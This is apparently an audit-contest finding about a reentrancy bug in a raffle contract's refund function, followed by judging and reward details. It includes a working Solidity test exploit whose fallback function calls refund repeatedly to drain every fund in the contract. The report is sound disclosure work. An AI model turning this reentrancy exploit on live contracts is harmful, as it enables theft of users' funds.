Submission Details
Severity:
Reentrancy in refund function
Summary
Reentrancy attack
Vulnerability Details
Updating state after sending eth allows malicious user to reenter the refund function. Add the following to the test file:
modifier EightPlayersEntered() {
address[] memory players = new address[](8);
players[0] = playerOne;
players[1] = playerTwo;
players[2] = playerThree;
players[3] = playerFour;
players[4] = playerFive;
players[5] = playerSix;
players[6] = playerSeven;
players[7] = playerEight;
puppyRaffle.enterRaffle{value: entranceFee * 8}(players);
_;
}
function testReentrancy() public EightPlayersEntered {
address[] memory players = new address[](1);
players[0] = address(this);
puppyRaffle.enterRaffle{value: entranceFee * 1}(players);
uint256 raffleBalancePre = address(puppyRaffle).balance;
puppyRaffle.refund(8);
uint256 raffleBalancePost = address(puppyRaffle).balance;
console.log("RAFFLE BALANCE PRE ATTACK: ", raffleBalancePre);
console.log("RAFFLE BALANCE POST ATTACK: ", raffleBalancePost);
assert(raffleBalancePost == 0);
}
fallback() external payable {
if(address(puppyRaffle).balance > 0) {
puppyRaffle.refund(8);
}
}
Impact
All funds drained
Tools Used
Manual review
Recommendations
Implement CEI pattern or use a reentrancy block modifier
Updates
Lead Judging Commences
Hamiltonite almost 2 years ago
Submission Judgement Published Assigned finding tags:
reentrancy-in-refund
reentrancy in refund() function
Rewards breakdown
nSLOC
143This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.